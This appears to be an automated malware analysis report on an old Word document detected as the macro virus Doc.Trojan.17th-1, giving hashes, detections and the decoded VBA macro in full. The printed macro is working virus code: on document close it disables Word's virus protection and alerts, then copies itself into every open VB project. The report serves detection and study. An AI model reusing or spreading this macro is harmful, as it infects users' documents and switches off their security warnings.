Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 533d34ee1eb44f03…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 1999-05-30 10:55:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 003608f86e5aef2ad2b590608841d4c7
SHA-1: 573c2fae6a3a0cea84e890a9b1f1452668d9cf80
SHA-256: 533d34ee1eb44f0341ee05d1e53b91e335668e9d9e10f741cb234463b7437842
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macro code attempts to disable virus protection and obfuscate its own description, indicating a potential attempt to evade analysis or detection. No specific payload or network activity was directly observed in the provided evidence.

Heuristics 2

  • ClamAV: Doc.Trojan.17th-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.17th-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 814 bytes
SHA-256: 79386f353a358dfa894d027aaef9b521ee6fdade03029daf9068bf4193fea302
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1�.ThisDocument�"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - 17th
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
Set α = VBE.VBProjects
For ι = 1 To α.Count
If α(ι).Protection <> 1 And α(ι).Description <> "17th" Then
α(ι).Description = "17th"
Set υ = α(ι).VBComponents(1).CodeModule
υ.DeleteLines 1, υ.CountOfLines
υ.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17)
End If: Next
End Sub